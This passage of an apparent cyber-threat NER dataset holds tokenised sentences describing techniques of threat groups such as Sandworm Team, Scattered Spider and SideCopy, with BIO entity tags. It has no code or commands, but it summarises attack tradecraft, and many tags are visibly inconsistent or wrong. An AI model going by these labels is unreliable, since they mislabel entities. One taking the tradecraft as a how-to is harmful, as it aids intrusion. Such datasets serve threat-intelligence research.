- "of", - "its", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-Org", - "B-OffAct", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "the", - "commercially", - "available", - "tool", - "RemoteExec", - "for", - "agentless", - "remote", - "code", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "delivered", - "malicious", - "Microsoft", - "Office", - "attachments", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "crafted", - "phishing", - "emails", - "containing", - "malicious", - "hyperlinks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "crafted", - "spearphishing", - "emails", - "with", - "hyperlinks", - "designed", - "to", - "trick", - "unwitting", - "recipients", - "into", - "revealing", - "their", - "account", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team's", - "BCS-server", - "tool", - "uses", - "base64", - "encoding", - "and", - "HTML", - "tags", - "for", - "the", - "communication", - "traffic", - "between", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "used", - "information", - "stealer", - "malware", - "to", - "collect", - "browser", - "session", - "cookies." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "used", - "a", - "backdoor", - "to", - "enumerate", - "information", - "about", - "the", - "infected", - "system's", - "operating", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "had", - "gathered", - "user,", - "IP", - "address,", - "and", - "server", - "data", - "related", - "to", - "RDP", - "sessions", - "on", - "a", - "compromised", - "host.", - "It", - "has", - "also", - "accessed", - "network", - "diagram", - "files", - "useful", - "for", - "understanding", - "how", - "a", - "host's", - "network", - "was", - "configured." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "collected", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "acquired", - "open-source", - "tools", - "for", - "their", - "operations,", - "including", - "Invoke-PSImage,", - "which", - "was", - "used", - "to", - "establish", - "an", - "encrypted", - "channel", - "from", - "a", - "compromised", - "host", - "to", - "Sandworm", - "Team's", - "C2", - "server", - "in", - "preparation", - "for", - "the", - "2018", - "Winter", - "Olympics", - "attack,", - "as", - "well", - "as", - "Impacket", - "and", - "RemoteExec,", - "which", - "were", - "used", - "in", - "their", - "2022", - "Prestige", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-OffAct", - "B-Area", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "dedicated", - "network", - "connections", - "from", - "one", - "victim", - "organization", - "to", - "gain", - "unauthorized", - "access", - "to", - "a", - "separate", - "organization." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "have", - "used", - "previously", - "acquired", - "legitimate", - "credentials", - "prior", - "to", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "created", - "VBScripts", - "to", - "run", - "an", - "SSH", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool" - ] - }, - { - "tokens": [ - "In", - "2017,", - "Sandworm", - "Team", - "conducted", - "technical", - "research", - "related", - "to", - "vulnerabilities", - "associated", - "with", - "websites", - "used", - "by", - "the", - "Korean", - "Sport", - "and", - "Olympic", - "Committee,", - "a", - "Korean", - "power", - "company,", - "and", - "a", - "Korean", - "airport." - ], - "ner_tags": [ - "O", - "B-Time", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Org", - "O", - "I-Org", - "O", - "O", - "B-Area", - "I-Org", - "O", - "O", - "O", - "B-Area", - "B-Org" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "scanned", - "network", - "infrastructure", - "for", - "vulnerabilities", - "as", - "part", - "of", - "its", - "operational", - "planning." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team's", - "BCS-server", - "tool", - "connects", - "to", - "the", - "designated", - "C2", - "server", - "via", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "webshells", - "including", - "P.A.S.", - "Webshell", - "to", - "maintain", - "access", - "to", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "Impacket’s", - "WMIexec", - "module", - "for", - "remote", - "code", - "execution", - "and", - "VBScript", - "to", - "run", - "WMI", - "queries." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Scarlet", - "Mimic", - "has", - "used", - "the", - "left-to-right", - "override", - "character", - "in", - "self-extracting", - "RAR", - "archive", - "spearphishing", - "attachment", - "file", - "names." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "IAM", - "manipulation", - "to", - "gain", - "persistence", - "and", - "to", - "assume", - "or", - "elevate", - "privileges.", - "Scattered", - "Spider", - "has", - "also", - "assigned", - "user", - "access", - "admin", - "roles", - "in", - "order", - "to", - "gain", - "Tenant", - "Root", - "Group", - "management", - "permissions", - "in", - "Azure." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "retrieves", - "browser", - "histories", - "via", - "infostealer", - "malware", - "such", - "as", - "Raccoon", - "Stealer." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "enumerates", - "cloud", - "environments", - "to", - "identify", - "server", - "and", - "backup", - "management", - "infrastructure,", - "resource", - "access,", - "databases", - "and", - "storage", - "containers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "abused", - "AWS", - "Systems", - "Manager", - "Inventory", - "to", - "identify", - "targets", - "on", - "the", - "compromised", - "network", - "prior", - "to", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "compromised", - "Azure", - "credentials", - "for", - "credential", - "theft", - "activity", - "and", - "lateral", - "movement", - "to", - "on-premises", - "systems.", - "Scattered", - "Spider", - "has", - "also", - "leveraged", - "pre-existing", - "AWS", - "EC2", - "instances", - "for", - "lateral", - "movement", - "and", - "data", - "collection", - "purposes." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "enumerates", - "data", - "stored", - "within", - "victim", - "code", - "repositories,", - "such", - "as", - "internal", - "GitHub", - "repositories." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "used", - "self-signed", - "and", - "stolen", - "certificates", - "originally", - "issued", - "to", - "NVIDIA", - "and", - "Global", - "Software", - "LLC." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "added", - "additional", - "trusted", - "locations", - "to", - "Azure", - "AD", - "conditional", - "access", - "policies." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "creates", - "new", - "user", - "identities", - "within", - "the", - "compromised", - "organization." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "access", - "to", - "the", - "victim's", - "Azure", - "tenant", - "to", - "create", - "Azure", - "VMs.", - "Scattered", - "Spider", - "has", - "also", - "created", - "Amazon", - "EC2", - "instances", - "within", - "the", - "victim's", - "environment." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "Spider", - "searches", - "for", - "credential", - "storage", - "documentation", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "used", - "BlackCat", - "ransomware", - "to", - "encrypt", - "files", - "on", - "VMWare", - "ESXi", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "stages", - "data", - "in", - "a", - "centralized", - "database", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "enumerates", - "data", - "stored", - "in", - "cloud", - "resources", - "for", - "collection", - "and", - "exfiltration", - "purposes." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "created", - "volume", - "shadow", - "copies", - "of", - "virtual", - "domain", - "controller", - "disks", - "to", - "extract", - "the", - "`NTDS.dit`", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "leverages", - "legitimate", - "domain", - "accounts", - "to", - "gain", - "access", - "to", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "creates", - "inbound", - "rules", - "on", - "the", - "compromised", - "email", - "accounts", - "of", - "security", - "personnel", - "to", - "automatically", - "delete", - "emails", - "from", - "vendor", - "security", - "products." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "exfiltrated", - "victim", - "data", - "to", - "the", - "MEGA", - "file", - "sharing", - "site." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "deployed", - "a", - "malicious", - "kernel", - "driver", - "through", - "exploitation", - "of", - "CVE-2015-2291", - "in", - "the", - "Intel", - "Ethernet", - "diagnostics", - "driver", - "for", - "Windows", - "(iqvw64.sys)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "leveraged", - "legitimate", - "remote", - "management", - "tools", - "to", - "maintain", - "persistent", - "access." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "Spider", - "enumerates", - "a", - "target", - "organization", - "for", - "files", - "and", - "directories", - "of", - "interest,", - "including", - "source", - "code." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "deployed", - "ransomware", - "on", - "compromised", - "hosts", - "for", - "financial", - "gain." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "impersonated", - "legitimate", - "IT", - "personnel", - "in", - "phone", - "calls", - "and", - "text", - "messages", - "either", - "to", - "direct", - "victims", - "to", - "a", - "credential", - "harvesting", - "site", - "or", - "getting", - "victims", - "to", - "run", - "commercial", - "remote", - "monitoring", - "and", - "management", - "(RMM)", - "tools.", - "Scattered", - "Spider", - "utilized", - "social", - "engineering", - "to", - "compel", - "IT", - "help", - "desk", - "personnel", - "to", - "reset", - "passwords", - "and", - "MFA", - "tokens." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Idus", - "B-HackOrg", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "compromising", - "user", - "accounts,", - "Scattered", - "Spider", - "registers", - "their", - "own", - "MFA", - "tokens." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "used", - "multifactor", - "authentication", - "(MFA)", - "fatigue", - "by", - "sending", - "repeated", - "MFA", - "authentication", - "requests", - "to", - "targets." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "extracted", - "the", - "`NTDS.dit`", - "file", - "by", - "creating", - "volume", - "shadow", - "copies", - "of", - "virtual", - "domain", - "controller", - "disks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "used", - "a", - "combination", - "of", - "credential", - "phishing", - "and", - "social", - "engineering", - "to", - "capture", - "one-time-password", - "(OTP)", - "codes." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "enumerate", - "and", - "exfiltrate", - "code-signing", - "certificates", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "directed", - "victims", - "to", - "run", - "remote", - "monitoring", - "and", - "management", - "(RMM)", - "tools.", - "In", - "addition", - "to", - "directing", - "victims", - "to", - "run", - "remote", - "software,", - "Scattered", - "Spider", - "members", - "themselves", - "also", - "deploy", - "RMM", - "software", - "including", - "AnyDesk,", - "LogMeIn,", - "and", - "ConnectWise", - "Control", - "to", - "establish", - "persistence", - "on", - "the", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "can", - "enumerate", - "remote", - "systems,", - "such", - "as", - "VMware", - "vCenter", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "phone", - "calls", - "to", - "instruct", - "victims", - "to", - "navigate", - "to", - "credential-harvesting", - "websites.", - "Scattered", - "Spider", - "has", - "also", - "called", - "employees", - "at", - "target", - "organizations", - "and", - "compelled", - "them", - "to", - "navigate", - "to", - "fake", - "login", - "portals", - "using", - "adversary-in-the-middle", - "toolkits." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "retrieves", - "browser", - "cookies", - "via", - "Raccoon", - "Stealer." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "adds", - "a", - "federated", - "identity", - "provider", - "to", - "the", - "victim’s", - "SSO", - "tenant", - "and", - "activates", - "automatic", - "account", - "linking." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scattered", - "Spider", - "has", - "impersonated", - "organization", - "IT", - "and", - "helpdesk", - "staff", - "to", - "instruct", - "victims", - "to", - "execute", - "commercial", - "remote", - "access", - "tools", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "used", - "a", - "malicious", - "loader", - "DLL", - "file", - "to", - "execute", - "the", - "`credwiz.exe`", - "process", - "and", - "side-load", - "the", - "malicious", - "payload", - "`Duser.dll`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "compromised", - "domains", - "for", - "some", - "of", - "their", - "infrastructure,", - "including", - "for", - "C2", - "and", - "staging", - "malware." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "delivered", - "trojanized", - "executables", - "via", - "spearphishing", - "emails", - "that", - "contacts", - "actor-controlled", - "servers", - "to", - "download", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Purp" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "clicking", - "on", - "malicious", - "embedded", - "archive", - "files", - "sent", - "via", - "spearphishing", - "campaigns." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "used", - "a", - "legitimate", - "DLL", - "file", - "name,", - "`Duser.dll`", - "to", - "disguise", - "a", - "malicious", - "remote", - "access", - "tool." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "utilized", - "`mshta.exe`", - "to", - "execute", - "a", - "malicious", - "hta", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "executed", - "malware", - "by", - "calling", - "the", - "API", - "function", - "`CreateProcessW`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "uses", - "a", - "loader", - "DLL", - "file", - "to", - "collect", - "AV", - "product", - "names", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "collected", - "browser", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "sent", - "spearphishing", - "emails", - "with", - "malicious", - "hta", - "file", - "attachments." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "crafted", - "generic", - "lures", - "for", - "spam", - "campaigns", - "to", - "collect", - "emails", - "and", - "credentials", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "identified", - "the", - "OS", - "version", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "identified", - "the", - "country", - "location", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "identified", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "used", - "compromised", - "domains", - "to", - "host", - "its", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideCopy", - "has", - "sent", - "Microsoft", - "Office", - "Publisher", - "documents", - "to", - "victims", - "that", - "have", - "embedded", - "malicious", - "macros", - "that", - "execute", - "an", - "hta", - "file", - "via", - "calling", - "`mshta.exe`." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "tools", - "to", - "automatically", - "collect", - "system", - "and", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "configured", - "tools", - "to", - "automatically", - "send", - "collected", - "files", - "to", - "attacker", - "controlled", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "base64", - "encoding", - "for", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "DLL", - "side-loading", - "to", - "drop", - "and", - "execute", - "malicious", - "payloads", - "including", - "the", - "hijacking", - "of", - "the", - "legitimate", - "Windows", - "application", - "file", - "rekeywiz.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - 